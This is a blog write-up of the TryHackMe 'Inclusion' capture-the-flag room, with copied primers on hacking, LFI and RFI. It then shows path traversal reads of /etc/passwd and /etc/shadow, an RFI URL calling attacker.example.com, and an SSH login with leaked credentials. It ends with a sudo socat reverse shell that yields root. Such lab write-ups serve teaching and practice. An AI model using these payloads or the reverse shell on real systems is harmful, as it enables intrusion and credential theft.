TRYHACKME-INCLUSION ROOM

,

Intro 

Hacking is identifying weakness in computer systems or networks to exploit its weaknesses to gain access. Example of Hacking: Using password cracking algorithm to gain access to a system Computers have become mandatory to run a successful businesses. It is not enough to have isolated computers systems; they need to be networked to facilitate communication with external businesses. This exposes them to the outside world and hacking. Hacking means using computers to commit fraudulent acts such as fraud, privacy invasion, stealing corporate/personal data, etc. Cyber crimes cost many organizations millions of dollars every year. Businesses need to protect themselves against such attacks. In this tutorial, we will learn- Common Hacking Terminologies What is Cyber Crime? Types of Cyber Crime What is Ethical Hacking? Why Ethical Hacking? Legality of Ethical Hacking Summary Before we go any further, let’s look at some of the most commonly used terminologies in the world of hacking. Who is a Hacker? Types of Hackers A Hacker is a person who finds and exploits the weakness in computer systems and/or networks to gain access. Hackers are usually skilled computer programmers with knowledge of computer security. Hackers are classified according to the intent of their actions. The following list classifies hackers according to their intent. Symbol Description What is Hacking ? An Introduction Ethical Hacker (White hat): A hacker who gains access to systems with a view to fix the identified weaknesses. They may also perform penetration Testing and vulnerability assessments. What is Hacking ? An Introduction Cracker (Black hat): A hacker who gains unauthorized access to computer systems for personal gain. The intent is usually to steal corporate data, violate privacy rights, transfer funds from bank accounts etc. What is Hacking ? An Introduction Grey hat: A hacker who is in between ethical and black hat hackers. He/she breaks into computer systems without authority with a view to identify weaknesses and reveal them to the system owner. What is Hacking ? An Introduction Script kiddies: A non-skilled person who gains access to computer systems using already made tools. What is Hacking ? An Introduction Hacktivist: A hacker who use hacking to send social, religious, and political, etc. messages. This is usually done by hijacking websites and leaving the message on the hijacked website. What is Hacking ? An Introduction Phreaker: A hacker who identifies and exploits weaknesses in telephones instead of computers. What is Cybercrime? Cyber crime is the use of computers and networks to perform illegal activities such as spreading computer viruses, online bullying, performing unauthorized electronic fund transfers, etc. Most cybercrimes are committed through the internet. Some cybercrimes can also be carried out using Mobile phones via SMS and online chatting applications. Type of Cybercrime The following list presents the common types of cybercrimes: Computer Fraud: Intentional deception for personal gain via the use of computer systems. Privacy violation: Exposing personal information such as email addresses, phone number, account details, etc. on social media, websites, etc. Identity Theft: Stealing personal information from somebody and impersonating that person. Sharing copyrighted files/information: This involves distributing copyright protected files such as eBooks and computer programs etc. Electronic funds transfer: This involves gaining an un-authorized access to bank computer networks and making illegal fund transfers. Electronic money laundering: This involves the use of the computer to launder money. ATM Fraud: This involves intercepting ATM card details such as account number and PIN numbers. These details are then used to withdraw funds from the intercepted accounts. Denial of Service Attacks: This involves the use of computers in multiple locations to attack servers with a view of shutting them down. Spam: Sending unauthorized emails. These emails usually contain advertisements. What is Ethical Hacking? Ethical Hacking is identifying weakness in computer systems and/or computer networks and coming with countermeasures that protect the weaknesses. Ethical hackers must abide by the following rules. Get written permission from the owner of the computer system and/or computer network before hacking. Protect the privacy of the organization been hacked. Transparently report all the identified weaknesses in the computer system to the organization. Inform hardware and software vendors of the identified weaknesses. Why Ethical Hacking? Information is one of the most valuable assets of an organization. Keeping information secure can protect an organization’s image and save an organization a lot of money. Hacking can lead to loss of business for organizations that deal in finance such as PayPal. Ethical hacking puts them a step ahead of the cyber criminals who would otherwise lead to loss of business. Legality of Ethical Hacking Ethical Hacking is legal if the hacker abides by the rules stipulated in the above section on the definition of ethical hacking. The International Council of E-Commerce Consultants (EC-Council) provides a certification program that tests individual’s skills. Those who pass the examination are awarded with certificates. The certificates are supposed to be renewed after some time. Summary Hacking is identifying and exploiting weaknesses in computer systems and/or computer networks. Cybercrime is committing a crime with the aid of computers and information technology infrastructure. Ethical Hacking is about improving the security of computer systems and/or computer networks. Ethical Hacking is legal. --> Taken from https://www.guru99.com/what-is-hacking-an-introduction.html

LFI

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement. Local File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI). The following is an example of PHP code that is vulnerable to LFI. /** * Get the filename from a GET input * Example - http://example.com/?file=filename.php */ $file = $_GET['file']; /** * Unsafely include the file * Example - filename.php */ include('directory/' . $file); In the above example, an attacker could make the following request. It tricks the application into executing a PHP script such as a web shell that the attacker managed to upload to the web server. http://example.com/?file=../../uploads/evil.php In this example, the file uploaded by the attacker will be included and executed by the user that runs the web application. That would allow an attacker to run any server-side malicious code that they want. This is a worst-case scenario. An attacker does not always have the ability to upload a malicious file to the application. Even if they did, there is no guarantee that the application will save the file on the same server where the LFI vulnerability exists. Even then, the attacker would still need to know the disk path to the uploaded file. Directory Traversal Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows. http://example.com/?file=../../../../etc/passwd In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack. --> taken from https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/

RFI

Using Remote File Inclusion (RFI), an attacker can cause the web application to include a remote file. This is possible for web applications that dynamically include external files or scripts. Potential consequences of a successful RFI attack range from sensitive information disclosure and Cross-site Scripting (XSS) to Remote Code Execution. Remote File Inclusion attacks usually occur when an application receives a path to a file as input and does not properly sanitize it. This allows an external URL to be supplied to the include function. The following is an example of PHP code with a Remote File Inclusion vulnerability. /** * Get the filename from a GET input * Example - http://example.com/?file=index.php */ $file = $_GET['file']; /** * Unsafely include the file * Example - index.php */ include($file); Using the above PHP script, an attacker could make the following HTTP request to trick the application into executing server-side malicious code, for example, a webshell. http://example.com/?file=http://attacker.example.com/evil.php In this example, the malicious file is included and run with the privileges of the user who runs the web application. That allows an attacker to run any code they want on the web server. They can even gain a persistent presence on the web server. --> taken from https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/

PRACTICAL

┌─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $nmap -sC -sV -A 10.10.84.203 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 22:10 IST
Nmap scan report for 10.10.84.203
Host is up (0.45s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After nmap scanning we know 2 ports are open,Lets move to the webpage we have 3 options on this site.

http://10.10.84.203/article?name=hacking

http://10.10.16.8/article?name=rfiattack

http://10.10.16.8/article?name=lfiattack

The PHP page (/article/index.php) is likely including a page that is passed as a parameter to name as follows:


if isset($_GET['name']) {
    include($_GET['name'])
}

http://10.10.84.203/article?name=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:rootpassword sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false

Notice in the /etc/passwd file that 1 of the entries has been commented and contains both a login and a password:

http://10.10.84.203/article?name=../../../../etc/shadow

root:$6$mFbzBSI/$c80cICObesNyF9XxbF6h6p6U2682MfG5gxJ5KtSLrGI8766/etwzBvppTuug6aLoltiSmeqdIaEUg6f/NLYDn0:18283:0:99999:7::: daemon:*:17647:0:99999:7::: bin:*:17647:0:99999:7::: sys:*:17647:0:99999:7::: sync:*:17647:0:99999:7::: games:*:17647:0:99999:7::: man:*:17647:0:99999:7::: lp:*:17647:0:99999:7::: mail:*:17647:0:99999:7::: news:*:17647:0:99999:7::: uucp:*:17647:0:99999:7::: proxy:*:17647:0:99999:7::: www-data:*:17647:0:99999:7::: backup:*:17647:0:99999:7::: list:*:17647:0:99999:7::: irc:*:17647:0:99999:7::: gnats:*:17647:0:99999:7::: nobody:*:17647:0:99999:7::: systemd-network:*:17647:0:99999:7::: systemd-resolve:*:17647:0:99999:7::: syslog:*:17647:0:99999:7::: messagebus:*:17647:0:99999:7::: _apt:*:17647:0:99999:7::: lxd:*:18281:0:99999:7::: uuidd:*:18281:0:99999:7::: dnsmasq:*:18281:0:99999:7::: landscape:*:18281:0:99999:7::: pollinate:*:18281:0:99999:7::: falconfeast:$6$dYJsdbeD$rlYGlx24kUUcSHTc0dMutxEesIAUA3d8nQeTt6FblVffELe3FxLE3gOID5nLxpHoycQ9mfSC.TNxLxet9BN5c/:18281:0:99999:7::: sshd:*:18281:0:99999:7::: mysql:!:18281:0:99999:7:::


We got ssh credentials connect with ssh

falconfeast:rootpassword 


┌─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $ssh falconfeast@10.10.84.203
The authenticity of host '10.10.84.203 (10.10.84.203)' can't be established.
ECDSA key fingerprint is SHA256:VRi7CZbTMsqjwnWmH2UVPWrLVIZzG4BQ9J6X+tVsuEQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.84.203' (ECDSA) to the list of known hosts.
falconfeast@10.10.84.203's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Dec  9 22:19:46 IST 2020

  System load:  0.0               Processes:           84
  Usage of /:   34.8% of 9.78GB   Users logged in:     0
  Memory usage: 65%               IP address for eth0: 10.10.84.203
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

3 packages can be updated.
3 updates are security updates.


Last login: Thu Jan 23 18:41:39 2020 from 192.168.1.107
falconfeast@inclusion:~$ ls -la
total 36
drwxr-xr-x 5 falconfeast falconfeast 4096 Jan 22  2020 .
drwxr-xr-x 3 root        root        4096 Jan 20  2020 ..
drwxr-xr-x 2 root        root        4096 Jan 21  2020 articles
lrwxrwxrwx 1 root        root           9 Jan 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 falconfeast falconfeast  220 Jan 20  2020 .bash_logout
-rw-r--r-- 1 falconfeast falconfeast 3771 Jan 20  2020 .bashrc
drwx------ 2 falconfeast falconfeast 4096 Jan 20  2020 .cache
drwx------ 3 falconfeast falconfeast 4096 Jan 20  2020 .gnupg
-rw-r--r-- 1 falconfeast falconfeast  807 Jan 20  2020 .profile
-rw-r--r-- 1 falconfeast falconfeast    0 Jan 21  2020 .sudo_as_admin_successful
-rw-r--r-- 1 falconfeast falconfeast   21 Jan 22  2020 user.txt
falconfeast@inclusion:~$ cat user.txt
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

GTFOBINS:Reverse shell

It can send back a reverse shell to a listening attacker to open a remote network access.

Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

RHOST=attacker.com
RPORT=12345
socat tcp-connect:10.x.y.z:9999 exec:/bin/sh,pty,stderr,setsid,sigint,sane

10.x.y.z=(your tun0 addr)

We can run socat with root privileges. first open new terminal for nc listener then switch to your remote host!

falconfeast@inclusion:~$sudo socat tcp-connect:10.x.y.z:9999 exec:/bin/sh,pty,stderr,setsid,sigint,sane
─[kevin@parrot]─[~/THM/Inclusion]
└──╼ $nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.x.y.z] from (UNKNOWN) [10.10.84.203] 33538
/bin/sh: 0: can't access tty; job control turned off
# id    
id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt😁




-
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Pages

Created By SoraTemplates | Distributed By Gooyaabi Templates